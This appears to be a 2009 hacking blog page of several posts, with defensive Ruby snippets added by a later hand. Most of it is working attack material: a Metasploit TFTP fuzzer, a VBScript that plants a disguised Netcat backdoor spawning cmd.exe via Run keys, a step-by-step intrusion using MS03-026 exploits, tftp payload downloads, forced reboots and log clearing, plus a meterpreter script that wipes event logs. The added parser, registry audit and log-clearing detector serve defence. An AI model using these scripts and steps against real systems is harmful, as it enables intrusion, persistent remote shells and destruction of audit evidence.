Sunday, November 22, 2009

Simple FTP Fuzzer

Guys, want to see the FTP Fuzzer?
Here is an example...

#Metasploit

require 'msf/core'

class Metasploit3 < Msf::Auxiliary
  include Msf::Auxiliary::Scanner

  def initialize
    super(
      'Name'        => '3Com TFTP Fuzzer',
      'Version'     => '$Revision: 1 $',
      'Description' => '3Com TFTP Fuzzer Passes Overly Long Transport Mode String',
      'Author'      => 'Your name here',
      'License'     => MSF_LICENSE
    )
    register_options([
      Opt::RPORT(69)
    ], self.class)
  end

  def run_host(ip)
    # Create an unbound UDP socket
    udp_sock = Rex::Socket::Udp.create(
      'Context' => {
        'Msf'        => framework,
        'MsfExploit' => self,
      }
    )
    count = 10 # Set an initial count
    while count < 2000 # While the count is under 2000 run
      evil = "A" * count # Set a number of "A"s equal to count
      # Define the payload: WRQ opcode (2), filename "A", NUL, the overly long mode string, NUL
      pkt = "\x00\x02" + "\x41" + "\x00" + evil + "\x00"
      udp_sock.sendto(pkt, ip, datastore['RPORT']) # Send the packet
      print_status("Sending: #{evil}") # Status update
      resp = udp_sock.get(1) # Capture the response (wait up to 1 second)
      count += 10 # Increase count by 10, and loop
    end
  end
end
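As an added example (not code from the original post or from Metasploit), here is the receiving side of what the fuzzer above exercises: a strict RFC 1350 request parser that a TFTP server or IDS can use to reject overlong or unknown mode strings before they reach a fixed-size buffer. The MAX_FIELD limit and the helper names are assumptions.

```ruby
# Added example, not from the original post: a strict parser for the TFTP
# read/write request (RFC 1350) that the fuzzer above sends. A server or
# IDS applying these checks rejects the overlong mode string before it can
# reach a fixed-size buffer, which is the bug class the fuzzer probes for.
TFTP_MODES = %w[netascii octet mail].freeze   # the only modes RFC 1350 defines
MAX_FIELD  = 255                               # constructed defensive limit
OPCODES    = { 1 => :rrq, 2 => :wrq }.freeze

class TftpRequestError < StandardError; end

# Parses a RRQ/WRQ packet into { opcode:, filename:, mode: } or raises.
def parse_tftp_request(pkt)
  raise TftpRequestError, 'packet too short' if pkt.bytesize < 4
  kind = OPCODES[pkt.byteslice(0, 2).unpack1('n')]
  raise TftpRequestError, 'not a read/write request' unless kind
  # filename and mode are both NUL-terminated; -1 keeps the empty tail
  fields = pkt.byteslice(2, pkt.bytesize - 2).split("\x00", -1)
  unless fields.size == 3 && fields[2].empty?
    raise TftpRequestError, 'filename/mode not properly NUL-terminated'
  end
  filename, mode = fields[0], fields[1]
  raise TftpRequestError, 'empty filename' if filename.empty?
  raise TftpRequestError, "filename too long (#{filename.bytesize})" if filename.bytesize > MAX_FIELD
  raise TftpRequestError, "mode too long (#{mode.bytesize})" if mode.bytesize > MAX_FIELD
  raise TftpRequestError, "unknown mode #{mode.inspect}" unless TFTP_MODES.include?(mode.downcase)
  { opcode: kind, filename: filename, mode: mode.downcase }
end

# Same layout the fuzzer builds: opcode, filename, NUL, mode, NUL.
def build_request(opcode, filename, mode)
  [opcode].pack('n') + filename + "\x00" + mode + "\x00"
end

# :ok or the rejection reason, as a server would log it.
def classify(pkt)
  parse_tftp_request(pkt)
  :ok
rescue TftpRequestError => e
  e.message
end

if __FILE__ == $PROGRAM_NAME
  [build_request(2, 'config.txt', 'octet'),
   build_request(2, 'A', 'A' * 500),        # what the fuzzer sends at count = 500
   build_request(1, 'boot.bin', 'bogus')].each do |pkt|
    puts "#{pkt.bytesize} bytes -> #{classify(pkt)}"
  end
end
```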

Tuesday, November 10, 2009

Metasploit Framework 3.3 No GUI & Web

As of Metasploit Framework 3.3, msfgui and msfweb will no longer be supported.

:) cihuy...

Tutorial: VBScript in Action

Here is an example of a VBScript that enables Remote Desktop and plants a trojan or backdoor (such as Netcat) in the registry, also known as a persistent Netcat.

' This VBScript will do the following:

' 1. Enable Remote Desktop
' 2. Plant Trojan or Backdoor in the Registry
'
' Rename your Netcat (nc.exe) as winntsvr.exe as a "camouflage"

Dim objShell, RegLocate, RegLocate1
Set objShell = WScript.CreateObject("WScript.Shell")
On Error Resume Next

' Enable Remote Desktop
RegLocate = "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections"
objShell.RegWrite RegLocate,"0","REG_DWORD"

' Plant Trojan or Backdoor in the Registry
RegLocate = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update"
objShell.RegWrite RegLocate,"C:\WINDOWS\System32\winntsvr -v -L -p443 -d -e cmd.exe","REG_SZ"

RegLocate = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Update"
objShell.RegWrite RegLocate,"C:\WINDOWS\System32\winntsvr -v -L -p443 -d -e cmd.exe","REG_SZ"

' Reverse Connect
' On the Target: winntsvr -v -L -p443 -d -e cmd.exe
' On the Attacker: nc -v 131.107.1.254 443

' Bind Connect
' On the Target: winntsvr -v 131.107.1.222 443 -d -e cmd.exe
' On the Attacker: nc -v -l -p443

WScript.Quit
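As an added example (not part of the original post), a Ruby audit of a .reg export that reports the two changes the script above makes: Remote Desktop enabled through fDenyTSConnections, and a Run/RunOnce value with the shape of the persistent Netcat command line. The .reg sample, the function names and the argument regex are assumptions.

```ruby
# Added example, not part of the original post: audits a .reg export of the
# keys the script above writes and reports both changes it makes: Remote
# Desktop enabled via fDenyTSConnections, and a Run/RunOnce entry whose
# command line has the shape of the persistent Netcat listener (-L -p<n> -e).
AUTOSTART_KEYS = [
  'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
  'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
].freeze
TS_KEY = 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server'
NETCAT_ARGS = /\s-[lL]\b.*\s-p\s*\d+.*\s-e\s+\S+/ # listen, port, then -e <program>

# Parses .reg export text into { key => { value_name => data } }; only
# "string" and dword: data are handled, which is all this audit needs.
def parse_reg_export(text)
  keys = Hash.new { |h, k| h[k] = {} }
  current = nil
  text.each_line do |raw|
    line = raw.strip
    if line.start_with?('[') && line.end_with?(']')
      current = line[1..-2]
    elsif current && (m = line.match(/\A"([^"]+)"=(?:"(.*)"|dword:(\h{8}))\z/))
      keys[current][m[1]] = m[2] ? m[2].gsub('\\\\') { '\\' } : m[3].to_i(16)
    end
  end
  keys
end
# Returns finding strings for a parsed export; empty when nothing is found.
def audit_persistence(keys)
  findings = []
  if keys.fetch(TS_KEY, {})['fDenyTSConnections'] == 0
    findings << 'Remote Desktop enabled: fDenyTSConnections = 0'
  end
  AUTOSTART_KEYS.each do |key|
    keys.fetch(key, {}).each do |name, cmd|
      next unless cmd.is_a?(String) && cmd.match?(NETCAT_ARGS)
      findings << "Netcat-style listener in #{key.split('\\').last}\\#{name}: #{cmd}"
    end
  end
  findings
end
# Constructed export reflecting the state the script leaves behind.
SAMPLE_REG = <<~'REG'
  [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
  "Update"="C:\\WINDOWS\\System32\\winntsvr -v -L -p443 -d -e cmd.exe"
  "ctfmon.exe"="C:\\WINDOWS\\system32\\ctfmon.exe"
  [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
  "fDenyTSConnections"=dword:00000000
REG
puts audit_persistence(parse_reg_export(SAMPLE_REG)) if __FILE__ == $PROGRAM_NAME
```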

Netcat and AntiVirus (bypass) ...

If your Netcat is detected by antivirus, you can do something about it.

Check this out:
http://www.packetstormsecurity.org/papers/virus/Taking_Back_Netcat.pdf

Good tutorial :)

Tutorial: Complete Hacking Steps

Complete Hacking Steps (TEST-XP2 vs DEN-WEB2) - Classic Method

TEST-XP2 = 131.107.1.222
DEN-WEB2 = 131.107.1.254

Step 1: Information Gathering (Scanning)

Scan Target with Nmap:
nmap -A 131.107.1.254

Step 2: Vulnerability Identification

Use Google search to find vulnerabilities on 131.107.1.254, based on the result of Step 1.

Example: MS03-026 (MS-RPC DCOM Vulnerability) or Scan with Nessus vulnerability scanner.

Step 3: Gain Access/Exploitation

Use Metasploit Framework 2.x or 3.x. Find the correct module (e.g. MS03-026).

>> Metasploit 2.x

msf > use msrpc_dcom_ms03_026
msf > set PAYLOAD win32_bind
msf > set RHOST 131.107.1.254
msf > set LPORT 5555
msf > exploit

>> Metasploit 3.x

msf > use windows/dcerpc/ms03_026_dcom
msf > set PAYLOAD windows/shell/bind_tcp
msf > set RHOST 131.107.1.254
msf > set LPORT 5555
msf > exploit

Step 4: Maintain Access

Ensure that you have launched the TFTPD32 (tftp server).

Upload all necessary scripts...
C:\WINDOWS\System32>tftp -i 131.107.1.222 GET start.cmd
C:\WINDOWS\System32>tftp -i 131.107.1.222 GET cleanup.cmd

Run the script...
C:\WINDOWS\System32>start.cmd

On TEST-XP2 machine, do the following:

Connect via Remote Desktop ...
User: myadmin
Password: P@ssw0rd

Open a new command prompt.
Launch Netcat to connect to the open port 443 on the remote machine...
Z:\Tools\NC>nc -v 131.107.1.254 443

Open another new command prompt.
Force the Target machine to reboot ...

Option 1: PSShutdown
Z:\Tools\SysinternalsSuite>psshutdown -r -f -u myadmin -p P@ssw0rd \\131.107.1.254

Option 2: Metasploit module
msf > use msasn1_ms04_007_killbill
msf > set PAYLOAD win32_bind
msf > set RHOST 131.107.1.254
msf > exploit

After the reboot, log on to the DEN-WEB2 machine with:
User: administrator
Password: P@ssw0rd

Switch to TEST-XP2 machine.

You should see your Netcat session connect.
Now you can connect to the Target machine at anytime.

If not, re-run the command:

Z:\Tools\NC>nc -v 131.107.1.254 443

Step 5: Cover Tracks/Housekeeping

Close your Metasploit Framework console window.
Switch to the Netcat opened command prompt.

Run the housekeeping script...

C:\WINDOWS\System32>cleanup.cmd

Check the Audit settings and Event logs. All should be cleared.

Monday, November 9, 2009

New Security Books - Recommended by Me!

Check this out:

Nmap Network Scanning
http://www.amazon.com/Nmap-Network-Scanning-Official-Discovery/dp/0979958717/ref=sr_1_1?ie=UTF8&s=books&qid=1257826537&sr=8-1

Professional Penetration Tester
http://www.amazon.com/Professional-Penetration-Testing-Creating-Operating/dp/1597494259/ref=sr_1_1?ie=UTF8&s=books&qid=1257826622&sr=1-1

I have read these books and I found that they discuss a lot of interesting topics. A must-have for security professionals.

For DVD contents, please email me.

Tuesday, November 3, 2009

Metasploit Framework 3.x Meterpreter Script

In the last step of hacking, we need to "clear the tracks", also known as "housekeeping". If you use a meterpreter payload, you can run this script to clear the logs on the victim machine:

ClearLogs.rb

# Clears Windows Event Logs

evtlogs = [
  'security',
  'system',
  'application',
  'directory service',
  'dns server',
  'file replication service'
]
puts("Clearing Event Logs, this will leave an event 517")
evtlogs.each do |evl|
  puts("Clearing the #{evl} Event Log")
  log = client.sys.eventlog.open(evl)
  log.clear
end
puts("All Clear! You are a Ninja!")

Save it and call it within the meterpreter.

meterpreter > run clearlogs

and Bingo! all logs are cleared...
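As an added example (not from the original post or from Metasploit) covering both Step 5 of the hacking steps and ClearLogs.rb above: detection logic over constructed event records that flags log-clearing events (517, as the script itself notes; 1102 and 104 on newer Windows) and groups a burst of them by one account into a single alert. The CSV layout, host and account names, and the 60-second window are assumptions.

```ruby
# Added example, not part of the original post, for Step 5 and ClearLogs.rb:
# detection of log clearing. As the script's own message says, wiping the
# Security log leaves event 517 on XP/2003 (1102 on Vista and later; 104
# when another log is cleared). The script clears several logs in one burst,
# so such events by one account within a short window become one alert.
require 'time'
LOG_CLEARED_IDS = { 517 => 'Security log cleared (XP/2003)',
                    1102 => 'Security log cleared',
                    104 => 'Event log cleared' }.freeze
BURST_WINDOW = 60 # seconds; constructed threshold
Event = Struct.new(:time, :log, :id, :user, :message)

# Parses constructed CSV-style lines: time,log,event_id,user,message
def parse_events(lines)
  lines.map do |l|
    t, log, id, user, msg = l.chomp.split(',', 5)
    Event.new(Time.iso8601(t), log, id.to_i, user, msg)
  end
end

# Returns alerts { user:, start:, logs: }; clearing events by the same user
# within BURST_WINDOW of the first one are merged into one alert.
def detect_log_clearing(events)
  cleared = events.select { |e| LOG_CLEARED_IDS.key?(e.id) }.sort_by(&:time)
  cleared.each_with_object([]) do |e, alerts|
    last = alerts.last
    if last && last[:user] == e.user && e.time - last[:start] <= BURST_WINDOW
      last[:logs] << e.log
    else
      alerts << { user: e.user, start: e.time, logs: [e.log] }
    end
  end
end

# Constructed sample: DEN-WEB2 is the XP target from the page (event 517);
# the second host shows the same action on a newer Windows.
SAMPLE_EVENTS = <<~CSV.lines
  2009-11-03T10:14:02Z,Security,528,DEN-WEB2\\administrator,Successful logon
  2009-11-03T10:20:11Z,Security,517,DEN-WEB2\\administrator,The audit log was cleared
  2009-11-03T15:00:00Z,Security,1102,WEB3\\svc_backup,The audit log was cleared
  2009-11-03T15:00:01Z,System,104,WEB3\\svc_backup,The System log file was cleared
  2009-11-03T15:00:02Z,Application,104,WEB3\\svc_backup,The Application log file was cleared
CSV

if __FILE__ == $PROGRAM_NAME
  detect_log_clearing(parse_events(SAMPLE_EVENTS)).each do |a|
    puts "#{a[:start].iso8601} #{a[:user]} cleared #{a[:logs].join(', ')}"
  end
end
```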